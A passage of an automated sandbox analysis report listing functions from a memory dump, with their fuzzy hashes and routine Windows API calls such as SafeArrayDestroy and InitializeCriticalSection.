                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 2f73cf9dd5b4ddcc9e4e2c554bc64df1fb65606304eb685381c14c70c2cfa711
                                            • Instruction ID: dbbf2a439c77a6cbf199658053bb4b96deb103f5d8ee32792f0d3ad15b211d60
                                            • Opcode Fuzzy Hash: 2f73cf9dd5b4ddcc9e4e2c554bc64df1fb65606304eb685381c14c70c2cfa711
                                            • Instruction Fuzzy Hash: B3313B70E016089FCB10CFA9CD80B6EB7B9AF89208F30858AE519E7751D775E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 0d250f79539a7817b6e3af1f9794423373cd1cfbcca04f429bbf4c4630b6dec3
                                            • Instruction ID: 00b348de224b4bb6edb75f54179e5ffb6fa8852c4eab6f5ac2ab4209799c49d5
                                            • Opcode Fuzzy Hash: 0d250f79539a7817b6e3af1f9794423373cd1cfbcca04f429bbf4c4630b6dec3
                                            • Instruction Fuzzy Hash: FC312770E016089FDB10DFA8C980BAEB7B9AF89208F30859AE419E7755D775ED81CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 2f73cf9dd5b4ddcc9e4e2c554bc64df1fb65606304eb685381c14c70c2cfa711
                                            • Instruction ID: 986b3089920354a4daf8a629165f34a29aacb692a489294c26aa64c53a4ceeaf
                                            • Opcode Fuzzy Hash: 2f73cf9dd5b4ddcc9e4e2c554bc64df1fb65606304eb685381c14c70c2cfa711
                                            • Instruction Fuzzy Hash: 76314DB0A016089FCB00CF69CE84BAEB7B9AF99308F30859AE518E7751C775E9418F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 367cad6ee9af4f116112654b6512c5221d3d9313b525f9fde974d75d850bc6b9
                                            • Instruction ID: 95b802194f621a36f435a99aedf912a943d4ad3a2699e4e33a8e7c2630c7356c
                                            • Opcode Fuzzy Hash: 367cad6ee9af4f116112654b6512c5221d3d9313b525f9fde974d75d850bc6b9
                                            • Instruction Fuzzy Hash: CC314AB0A016099FCB00CF69CE84B6DB7B9AF99208F30859AE418EB751D775E9418F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 4e8a0c9897911da94c1c96507ee744a998b511ea43b011f074a4fa5d1d5b2a35
                                            • Instruction ID: 8cf6c07e557247e94ba280e1aecd41ee73a1aef32ce159d24895af73078ad38b
                                            • Opcode Fuzzy Hash: 4e8a0c9897911da94c1c96507ee744a998b511ea43b011f074a4fa5d1d5b2a35
                                            • Instruction Fuzzy Hash: DF314CB0A016099FCB00CF69CE84B6DB7B9AF99208F30859AE518E7745C775E9418F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 367cad6ee9af4f116112654b6512c5221d3d9313b525f9fde974d75d850bc6b9
                                            • Instruction ID: 78e12da5b81dace4b9350b8c4f8d2f63217c5d4ed9eba9f8d87ed98138aff2b3
                                            • Opcode Fuzzy Hash: 367cad6ee9af4f116112654b6512c5221d3d9313b525f9fde974d75d850bc6b9
                                            • Instruction Fuzzy Hash: D6312A70E016189FDB00CF68C980B6EB7B9AF89208F30858AE519E7751D775E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 3dd75c302036c626ed5bc977f063b7711639fb1b3a9a8193ada8ac246d441529
                                            • Instruction ID: 27154c9a5e54fd769c1741d6f4ec9ce98f97c7309b2b5d408dfe4a9be8b5b64b
                                            • Opcode Fuzzy Hash: 3dd75c302036c626ed5bc977f063b7711639fb1b3a9a8193ada8ac246d441529
                                            • Instruction Fuzzy Hash: 32313C70E416189FCB00CFA9CD80B6EB7B9AF89208F30858AE419E7751D775E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 4e8a0c9897911da94c1c96507ee744a998b511ea43b011f074a4fa5d1d5b2a35
                                            • Instruction ID: 1c6782cb670181e2e336be0602cc6f638fda7b2223004e748e52f106198215fe
                                            • Opcode Fuzzy Hash: 4e8a0c9897911da94c1c96507ee744a998b511ea43b011f074a4fa5d1d5b2a35
                                            • Instruction Fuzzy Hash: 5C313C71E016089FDB00CF69CD80BAEB7B9AF89208F30859AE519E7751D775E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 1dedc86250a47239049d0da5eb7f2d9ea96b2b3b9515ed5713818baec625c288
                                            • Instruction ID: cee8eb5fb97670424921dfb3346a366d46404abef2cf09b2242fc5255f230df7
                                            • Opcode Fuzzy Hash: 1dedc86250a47239049d0da5eb7f2d9ea96b2b3b9515ed5713818baec625c288
                                            • Instruction Fuzzy Hash: 64312870E016089FDB00CFA8C980BAEB7B9AF89208F30858AE419E7751D775E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: b717b4ac98d7b7d90c6724fe260f24b8dd5280ddabf0ff320f33316e33c512cb
                                            • Instruction ID: 8a29a290bbeaa59a11dc25e6cf3f6af405157ca2db75fd7a12a6d4de4f257657
                                            • Opcode Fuzzy Hash: b717b4ac98d7b7d90c6724fe260f24b8dd5280ddabf0ff320f33316e33c512cb
                                            • Instruction Fuzzy Hash: F3313B70E016089FCB00DFA9CD80B6EB7B9AF89208F30858AE419E7751D775E981CF50
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6CF111FD,000000FF,?,6CEA8B80,00000000,?,00000000,?,6CEA8C13,?,?), ref: 6CEA7415
                                            • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6CF111FD,000000FF,?,6CEA8B80,00000000,?,00000000,?,6CEA8C13,?,?), ref: 6CEA741B
                                            • std::exception::exception.LIBCMT ref: 6CEA743D
                                            • __CxxThrowException@8.LIBCMT ref: 6CEA7452
                                            • std::exception::exception.LIBCMT ref: 6CEA7461
                                            • __CxxThrowException@8.LIBCMT ref: 6CEA7476
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
                                              • Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
                                            • String ID:
                                            • API String ID: 189561132-0
                                            • Opcode ID: ee65483b06d355ae3ba855153a1c2d6465e391ac7e6816ccdee0bf0b2ab00fb4
                                            • Instruction ID: 856ab8118d62e3e43baccd79a59dbe84dede6c8b7fa25a3efcf95e070423731b
                                            • Opcode Fuzzy Hash: ee65483b06d355ae3ba855153a1c2d6465e391ac7e6816ccdee0bf0b2ab00fb4
                                            • Instruction Fuzzy Hash: F1318BB29046449FC751CF59C880A9AFBF8FF58310B54895EE85A97B00D731F605CBA1
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 04a71124eec1266f15032bede2c8fb1ce971f07ab39ab5b12e898db1874695ab
                                            • Instruction ID: ff96fa193f956969f48d146be473e2096f404058072bd441ade750040defe063
                                            • Opcode Fuzzy Hash: 04a71124eec1266f15032bede2c8fb1ce971f07ab39ab5b12e898db1874695ab
                                            • Instruction Fuzzy Hash: 5C312970E416189FDB10DBA9CD80BAEB7B9AF85208F34859AE419E7741C771E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 1dbc0cb078bd0959133217d36a2e6ff6032a9aafaf621a5f94095e7272368a57
                                            • Instruction ID: 7ff516df43157271b60fbf4e00921a57ab1b534c58025479f998d2dcc41161a7
                                            • Opcode Fuzzy Hash: 1dbc0cb078bd0959133217d36a2e6ff6032a9aafaf621a5f94095e7272368a57
                                            • Instruction Fuzzy Hash: 49313C70E416189FCB10CFA9CD80BAEB7B9AF85208F34868AE459E7745D771E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
